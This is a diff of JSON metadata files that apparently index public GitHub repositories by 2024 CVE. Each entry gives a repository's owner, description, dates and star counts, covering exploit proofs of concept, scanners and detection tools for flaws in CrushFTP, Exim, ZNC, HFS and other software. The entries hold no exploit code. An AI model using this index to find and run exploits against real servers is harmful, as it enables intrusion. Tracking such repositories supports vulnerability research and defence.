"https:\/\/avatars.githubusercontent.com\/u\/113431512?v=4", + "html_url": "https:\/\/github.com\/apena-ba", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/apena-ba\/CVE-2024-39306", + "description": null, + "fork": false, + "created_at": "2024-07-31T14:57:03Z", + "updated_at": "2024-08-28T06:24:27Z", + "pushed_at": "2024-07-31T15:07:13Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-39614.json b/2024/CVE-2024-39614.json new file mode 100644 index 0000000000..4bfdef7c04 --- /dev/null +++ b/2024/CVE-2024-39614.json @@ -0,0 +1,33 @@ +[ + { + "id": 837370546, + "name": "-CVE-2024-39614", + "full_name": "Abdurahmon3236\/-CVE-2024-39614", + "owner": { + "login": "Abdurahmon3236", + "id": 76862934, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76862934?v=4", + "html_url": "https:\/\/github.com\/Abdurahmon3236", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Abdurahmon3236\/-CVE-2024-39614", + "description": null, + "fork": false, + "created_at": "2024-08-02T20:11:29Z", + "updated_at": "2024-08-29T13:31:15Z", + "pushed_at": "2024-08-02T20:15:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-39689.json b/2024/CVE-2024-39689.json new file mode 100644 index 0000000000..388d9db0ff --- /dev/null +++ b/2024/CVE-2024-39689.json @@ -0,0 +1,33 @@ +[ + { + "id": 774962980, + "name": "InfraTest", + "full_name": "roy-aladin\/InfraTest", + "owner": { + "login": "roy-aladin", + "id": 163787028, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/163787028?v=4", + "html_url": "https:\/\/github.com\/roy-aladin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/roy-aladin\/InfraTest", + "description": "DO NOT FORK, DEPLOY, OR USE FOR ANYTHING BUT LEARNING. These requirements are vulnerable to CVE-2024-39689", + "fork": false, + "created_at": "2024-03-20T14:16:38Z", + "updated_at": "2024-07-06T17:31:04Z", + "pushed_at": "2024-07-06T17:31:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-39700.json b/2024/CVE-2024-39700.json new file mode 100644 index 0000000000..b500780437 --- /dev/null +++ b/2024/CVE-2024-39700.json @@ -0,0 +1,33 @@ +[ + { + "id": 835137529, + "name": "CVE-2024-39700-PoC", + "full_name": "LOURC0D3\/CVE-2024-39700-PoC", + "owner": { + "login": "LOURC0D3", + "id": 83567597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83567597?v=4", + "html_url": "https:\/\/github.com\/LOURC0D3", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LOURC0D3\/CVE-2024-39700-PoC", + "description": "CVE-2024-39700 Proof of Concept", + "fork": false, + "created_at": "2024-07-29T08:33:12Z", + "updated_at": "2024-08-01T06:52:18Z", + "pushed_at": "2024-07-31T04:13:53Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-39844.json b/2024/CVE-2024-39844.json new file mode 100644 index 0000000000..3a244b2a6b --- /dev/null +++ b/2024/CVE-2024-39844.json @@ -0,0 +1,33 @@ +[ + { + "id": 823880170, + "name": "CVE-2024-39844", + "full_name": "ph1ns\/CVE-2024-39844", + "owner": { + "login": "ph1ns", + "id": 165745967, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/165745967?v=4", + "html_url": "https:\/\/github.com\/ph1ns", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ph1ns\/CVE-2024-39844", + "description": "CVE-2024-39844 (ZNC < 1.9.1 modtcl RCE)", + "fork": false, + "created_at": "2024-07-03T23:27:25Z", + "updated_at": "2024-11-20T16:30:53Z", + "pushed_at": "2024-07-03T23:30:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-39929.json b/2024/CVE-2024-39929.json new file mode 100644 index 0000000000..09b8870383 --- /dev/null +++ b/2024/CVE-2024-39929.json @@ -0,0 +1,64 @@ +[ + { + "id": 827940099, + "name": "CVE-2024-39929", + "full_name": "rxerium\/CVE-2024-39929", + "owner": { + "login": "rxerium", + "id": 59293085, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59293085?v=4", + "html_url": "https:\/\/github.com\/rxerium", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rxerium\/CVE-2024-39929", + "description": "Detection method for Exim vulnerability CVE-2024-39929 ", + "fork": false, + "created_at": "2024-07-12T18:01:30Z", + "updated_at": "2024-10-21T02:30:38Z", + "pushed_at": "2024-10-05T06:17:28Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 835307900, + "name": "CVE-2024-39929", + "full_name": "michael-david-fry\/CVE-2024-39929", + "owner": { + "login": "michael-david-fry", + "id": 4213469, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4213469?v=4", + "html_url": "https:\/\/github.com\/michael-david-fry", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/michael-david-fry\/CVE-2024-39929", + "description": "POC to test CVE-2024-39929 against EXIM mail servers", + "fork": false, + "created_at": "2024-07-29T15:09:53Z", + "updated_at": "2024-11-20T16:30:59Z", + "pushed_at": "2024-08-01T16:41:43Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-39943.json b/2024/CVE-2024-39943.json new file mode 100644 index 0000000000..32e13c634a --- /dev/null +++ b/2024/CVE-2024-39943.json @@ -0,0 +1,33 @@ +[ + { + "id": 824447243, + "name": "CVE-2024-39943-Poc", + "full_name": "truonghuuphuc\/CVE-2024-39943-Poc", + "owner": { + "login": "truonghuuphuc", + "id": 20487674, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20487674?v=4", + "html_url": "https:\/\/github.com\/truonghuuphuc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/truonghuuphuc\/CVE-2024-39943-Poc", + "description": "CVE-2024-39943 rejetto HFS (aka HTTP File Server) 3 before 0.52.10 on Linux, UNIX, and macOS allows OS command execution by remote authenticated users (if they have Upload permissions). This occurs because a shell is used to execute df (i.e., with execSync instead of spawnSync in child_process in Node.js).", + "fork": false, + "created_at": "2024-07-05T06:46:34Z", + "updated_at": "2024-11-20T16:30:53Z", + "pushed_at": "2024-07-07T03:41:03Z", + "stargazers_count": 17, + "watchers_count": 17, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 17, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-40080.json b/2024/CVE-2024-40080.json new file mode 100644 index 0000000000..9834679b45 --- /dev/null +++ b/2024/CVE-2024-40080.json @@ -0,0 +1,33 @@ +[ + { + "id": 838855658, + "name": "CVE-2024-40080", + "full_name": "perras\/CVE-2024-40080", + "owner": { + "login": "perras", + "id": 7707264, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7707264?v=4", + "html_url": "https:\/\/github.com\/perras", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/perras\/CVE-2024-40080", + "description": "cve discovery proof-of-concept", + "fork": false, + "created_at": "2024-08-06T13:28:53Z", + "updated_at": "2024-08-06T13:32:51Z", + "pushed_at": "2024-08-06T13:32:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-40110.json b/2024/CVE-2024-40110.json new file mode 100644 index 0000000000..7fae6087ff --- /dev/null +++ b/2024/CVE-2024-40110.json @@ -0,0 +1,33 @@ +[ + { + "id": 837372055, + "name": "CVE-2024-40110", + "full_name": "Abdurahmon3236\/CVE-2024-40110", + "owner": { + "login": "Abdurahmon3236", + "id": 76862934, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76862934?v=4", + "html_url": "https:\/\/github.com\/Abdurahmon3236", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Abdurahmon3236\/CVE-2024-40110", + "description": null, + "fork": false, + "created_at": "2024-08-02T20:17:25Z", + "updated_at": "2024-08-02T20:20:27Z", + "pushed_at": "2024-08-02T20:20:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-40119.json b/2024/CVE-2024-40119.json new file mode 100644 index 0000000000..5d072ad9cd --- /dev/null +++ b/2024/CVE-2024-40119.json @@ -0,0 +1,33 @@ +[ + { + "id": 829794758, + "name": "nepstech-xpon-router-CVE-2024-40119", + "full_name": "sudo-subho\/nepstech-xpon-router-CVE-2024-40119", + "owner": { + "login": "sudo-subho", + "id": 77957540, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77957540?v=4", + "html_url": "https:\/\/github.com\/sudo-subho", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sudo-subho\/nepstech-xpon-router-CVE-2024-40119", + "description": "Cross-Site Request Forgery (CSRF) vulnerability in the password change function, which allows remote attackers to change the admin password without the user's consent, leading to a potential account takeover.", + "fork": false, + "created_at": "2024-07-17T03:03:42Z", + "updated_at": "2024-07-17T03:10:19Z", + "pushed_at": "2024-07-17T03:10:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-40318.json b/2024/CVE-2024-40318.json new file mode 100644 index 0000000000..7329120764 --- /dev/null +++ b/2024/CVE-2024-40318.json @@ -0,0 +1,35 @@ +[ + { + "id": 821134638, + "name": "RCE-QloApps-CVE-2024-40318", + "full_name": "3v1lC0d3\/RCE-QloApps-CVE-2024-40318", + "owner": { + "login": "3v1lC0d3", + "id": 50186884, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50186884?v=4", + "html_url": "https:\/\/github.com\/3v1lC0d3", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/3v1lC0d3\/RCE-QloApps-CVE-2024-40318", + "description": "Remote code execution Vulnerability in QloApps  (version 1.6.0.0)", + "fork": false, + "created_at": "2024-06-27T22:15:16Z", + "updated_at": "2024-07-28T00:11:44Z", + "pushed_at": "2024-07-28T00:11:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "codeinjection" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-40324.json b/2024/CVE-2024-40324.json new file mode 100644 index 0000000000..5b271e500a --- /dev/null +++ b/2024/CVE-2024-40324.json @@ -0,0 +1,33 @@ +[ + { + "id": 833662029, + "name": "CVE-2024-40324", + "full_name": "aleksey-vi\/CVE-2024-40324", + "owner": { + "login": "aleksey-vi", + "id": 65017000, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65017000?v=4", + "html_url": "https:\/\/github.com\/aleksey-vi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aleksey-vi\/CVE-2024-40324", + "description": null, + "fork": false, + "created_at": "2024-07-25T13:48:22Z", + "updated_at": "2024-07-25T13:57:54Z", + "pushed_at": "2024-07-25T13:57:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-40348.json b/2024/CVE-2024-40348.json new file mode 100644 index 0000000000..8292aba0c8 --- /dev/null +++ b/2024/CVE-2024-40348.json @@ -0,0 +1,33 @@ +[ + { + "id": 831572355, + "name": "CVE-2024-40348", + "full_name": "bigb0x\/CVE-2024-40348", + "owner": { + "login": "bigb0x", + "id": 13532434, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13532434?v=4", + "html_url": "https:\/\/github.com\/bigb0x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bigb0x\/CVE-2024-40348", + "description": "POC for CVE-2024-40348. Will attempt to read \/etc\/passwd from target", + "fork": false, + "created_at": "2024-07-21T00:54:55Z", + "updated_at": "2024-11-20T16:30:57Z", + "pushed_at": "2024-07-21T09:54:02Z", + "stargazers_count": 27, + "watchers_count": 27, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 27, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-4040.json b/2024/CVE-2024-4040.json new file mode 100644 index 0000000000..6c6bd2105f --- /dev/null +++ b/2024/CVE-2024-4040.json @@ -0,0 +1,533 @@ +[ + { + "id": 790656600, + "name": "CVE-2024-4040", + "full_name": "airbus-cert\/CVE-2024-4040", + "owner": { + "login": "airbus-cert", + "id": 26453405, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26453405?v=4", + "html_url": "https:\/\/github.com\/airbus-cert", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/airbus-cert\/CVE-2024-4040", + "description": "Scanner for CVE-2024-4040", + "fork": false, + "created_at": "2024-04-23T09:31:29Z", + "updated_at": "2024-11-23T22:43:47Z", + "pushed_at": "2024-05-17T06:48:43Z", + "stargazers_count": 48, + "watchers_count": 48, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 48, + "score": 0, + "subscribers_count": 8 + }, + { + "id": 791624022, + "name": "CVE-2024-4040-Scanner", + "full_name": "tucommenceapousser\/CVE-2024-4040-Scanner", + "owner": { + "login": "tucommenceapousser", + "id": 129875733, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/129875733?v=4", + "html_url": "https:\/\/github.com\/tucommenceapousser", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tucommenceapousser\/CVE-2024-4040-Scanner", + "description": "Scanner of vulnerability on crushftp instance", + "fork": false, + "created_at": "2024-04-25T04:01:23Z", + "updated_at": "2024-05-19T22:49:33Z", + "pushed_at": "2024-04-25T04:31:08Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 791636172, + "name": "CVE-2024-4040", + "full_name": "rbih-boulanouar\/CVE-2024-4040", + "owner": { + "login": "rbih-boulanouar", + "id": 79673409, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79673409?v=4", + "html_url": "https:\/\/github.com\/rbih-boulanouar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rbih-boulanouar\/CVE-2024-4040", + "description": null, + "fork": false, + "created_at": "2024-04-25T04:45:38Z", + "updated_at": "2024-07-30T16:14:52Z", + "pushed_at": "2024-04-25T04:56:50Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 13, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 791645744, + "name": "CVE-2024-4040", + "full_name": "Mufti22\/CVE-2024-4040", + "owner": { + "login": "Mufti22", + "id": 75854478, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75854478?v=4", + "html_url": "https:\/\/github.com\/Mufti22", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Mufti22\/CVE-2024-4040", + "description": "A server side template injection vulnerability in CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows unauthenticated remote attackers to read files from the filesystem outside of the VFS Sandbox, bypass authentication to gain administrative access, and perform remote code execution on the server.", + "fork": false, + "created_at": "2024-04-25T05:18:06Z", + "updated_at": "2024-06-21T00:12:21Z", + "pushed_at": "2024-04-25T05:21:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 792008958, + "name": "CVE-2024-4040-SSTI-LFI-PoC", + "full_name": "Stuub\/CVE-2024-4040-SSTI-LFI-PoC", + "owner": { + "login": "Stuub", + "id": 60468836, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60468836?v=4", + "html_url": "https:\/\/github.com\/Stuub", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Stuub\/CVE-2024-4040-SSTI-LFI-PoC", + "description": "CVE-2024-4040 CrushFTP SSTI LFI & Auth Bypass | Full Server Takeover | Wordlist Support", + "fork": false, + "created_at": "2024-04-25T19:51:38Z", + "updated_at": "2024-11-20T16:30:45Z", + "pushed_at": "2024-07-07T23:47:58Z", + "stargazers_count": 54, + "watchers_count": 54, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0day", + "arbitrary-file-read", + "crushftp", + "crushftp0day", + "cve", + "cve-2024-4040", + "cve-2024-4040-exploit", + "cve-2024-4040-poc", + "cve2024-4040", + "lfi", + "owasp", + "python", + "rce", + "sftp" + ], + "visibility": "public", + "forks": 7, + "watchers": 54, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 793110572, + "name": "CVE-2024-4040", + "full_name": "0xN7y\/CVE-2024-4040", + "owner": { + "login": "0xN7y", + "id": 70061541, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70061541?v=4", + "html_url": "https:\/\/github.com\/0xN7y", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xN7y\/CVE-2024-4040", + "description": "exploit for CVE-2024-4040", + "fork": false, + "created_at": "2024-04-28T13:06:01Z", + "updated_at": "2024-10-23T13:17:06Z", + "pushed_at": "2024-04-28T13:06:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 793492567, + "name": "CVE-2024-4040-CrushFTP-server", + "full_name": "Praison001\/CVE-2024-4040-CrushFTP-server", + "owner": { + "login": "Praison001", + "id": 60835238, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60835238?v=4", + "html_url": "https:\/\/github.com\/Praison001", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Praison001\/CVE-2024-4040-CrushFTP-server", + "description": "Exploit for CVE-2024-4040 affecting CrushFTP server in all versions before 10.7.1 and 11.1.0 on all platforms", + "fork": false, + "created_at": "2024-04-29T10:21:53Z", + "updated_at": "2024-04-29T10:27:07Z", + "pushed_at": "2024-04-29T10:27:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 794110110, + "name": "CVE-2024-4040", + "full_name": "Mohammaddvd\/CVE-2024-4040", + "owner": { + "login": "Mohammaddvd", + "id": 108727157, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108727157?v=4", + "html_url": "https:\/\/github.com\/Mohammaddvd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Mohammaddvd\/CVE-2024-4040", + "description": "Exploit CrushFTP CVE-2024-4040", + "fork": false, + "created_at": "2024-04-30T13:27:34Z", + "updated_at": "2024-09-18T08:50:19Z", + "pushed_at": "2024-04-30T13:36:33Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 794593495, + "name": "CVE-2024-4040-CrushFTP-File-Read-vulnerability", + "full_name": "jakabakos\/CVE-2024-4040-CrushFTP-File-Read-vulnerability", + "owner": { + "login": "jakabakos", + "id": 42498816, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42498816?v=4", + "html_url": "https:\/\/github.com\/jakabakos", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jakabakos\/CVE-2024-4040-CrushFTP-File-Read-vulnerability", + "description": null, + "fork": false, + "created_at": "2024-05-01T14:42:39Z", + "updated_at": "2024-06-06T11:58:36Z", + "pushed_at": "2024-05-02T09:58:21Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 795736659, + "name": "CVE-2024-4040", + "full_name": "gotr00t0day\/CVE-2024-4040", + "owner": { + "login": "gotr00t0day", + "id": 48636787, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48636787?v=4", + "html_url": "https:\/\/github.com\/gotr00t0day", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gotr00t0day\/CVE-2024-4040", + "description": "A server side template injection vulnerability in CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows unauthenticated remote attackers to read files from the filesystem outside of the VFS Sandbox, bypass authentication to gain administrative access, and perform remote code execution on the server.", + "fork": false, + "created_at": "2024-05-03T23:29:53Z", + "updated_at": "2024-11-08T09:40:41Z", + "pushed_at": "2024-05-04T00:05:16Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 11, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 800094876, + "name": "CVE-2024-4040", + "full_name": "1ncendium\/CVE-2024-4040", + "owner": { + "login": "1ncendium", + "id": 50025292, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50025292?v=4", + "html_url": "https:\/\/github.com\/1ncendium", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/1ncendium\/CVE-2024-4040", + "description": "A server side template injection vulnerability in CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows unauthenticated remote attackers to read files from the filesystem outside of the VFS Sandbox, bypass authentication to gain administrative access, and perform remote code execution on the server. ", + "fork": false, + "created_at": "2024-05-13T17:33:36Z", + "updated_at": "2024-05-13T17:33:41Z", + "pushed_at": "2024-05-13T17:33:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 821345624, + "name": "CVE-2024-4040", + "full_name": "olebris\/CVE-2024-4040", + "owner": { + "login": "olebris", + "id": 78493240, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78493240?v=4", + "html_url": "https:\/\/github.com\/olebris", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/olebris\/CVE-2024-4040", + "description": "CVE-2024-4040 PoC", + "fork": false, + "created_at": "2024-06-28T10:32:51Z", + "updated_at": "2024-06-28T11:50:56Z", + "pushed_at": "2024-06-28T10:33:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 824427234, + "name": "CVE-2024-4040", + "full_name": "entroychang\/CVE-2024-4040", + "owner": { + "login": "entroychang", + "id": 56551382, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56551382?v=4", + "html_url": "https:\/\/github.com\/entroychang", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/entroychang\/CVE-2024-4040", + "description": "CVE-2024-4040 PoC", + "fork": false, + "created_at": "2024-07-05T05:46:56Z", + "updated_at": "2024-11-20T16:30:53Z", + "pushed_at": "2024-07-09T09:48:17Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2024-4040", + "exploit" + ], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 859098985, + "name": "CrushFTP-cve-2024-4040-poc", + "full_name": "safeer-accuknox\/CrushFTP-cve-2024-4040-poc", + "owner": { + "login": "safeer-accuknox", + "id": 180378107, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/180378107?v=4", + "html_url": "https:\/\/github.com\/safeer-accuknox", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/safeer-accuknox\/CrushFTP-cve-2024-4040-poc", + "description": null, + "fork": false, + "created_at": "2024-09-18T04:45:54Z", + "updated_at": "2024-10-16T07:21:52Z", + "pushed_at": "2024-10-16T07:21:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 865497094, + "name": "GenCrushSSTIExploit", + "full_name": "geniuszlyy\/GenCrushSSTIExploit", + "owner": { + "login": "geniuszlyy", + "id": 137893386, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/137893386?v=4", + "html_url": "https:\/\/github.com\/geniuszlyy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geniuszlyy\/GenCrushSSTIExploit", + "description": "is a PoC for CVE-2024-4040 tool for exploiting the SSTI vulnerability in CrushFTP", + "fork": false, + "created_at": "2024-09-30T16:18:07Z", + "updated_at": "2024-11-20T16:31:06Z", + "pushed_at": "2024-09-30T16:19:24Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "crush", + "crush-ssti", + "cve", + "cve-2024-4040", + "cybersecurity", + "ethical-hacking", + "exploit", + "exploit-development", + "gencrushsstiexploit", + "penetration-testing", + "security", + "server-side-template-injection", + "ssti", + "vulnerability", + "web-security" + ], + "visibility": "public", + "forks": 1, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 877132815, + "name": "CVE-2024-4040", + "full_name": "rahisec\/CVE-2024-4040", + "owner": { + "login": "rahisec", + "id": 35906436, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35906436?v=4", + "html_url": "https:\/\/github.com\/rahisec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rahisec\/CVE-2024-4040", + "description": null, + "fork": false, + "created_at": "2024-10-23T06:29:19Z", + "updated_at": "2024-10-23T06:31:12Z", + "pushed_at": "2024-10-23T06:31:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 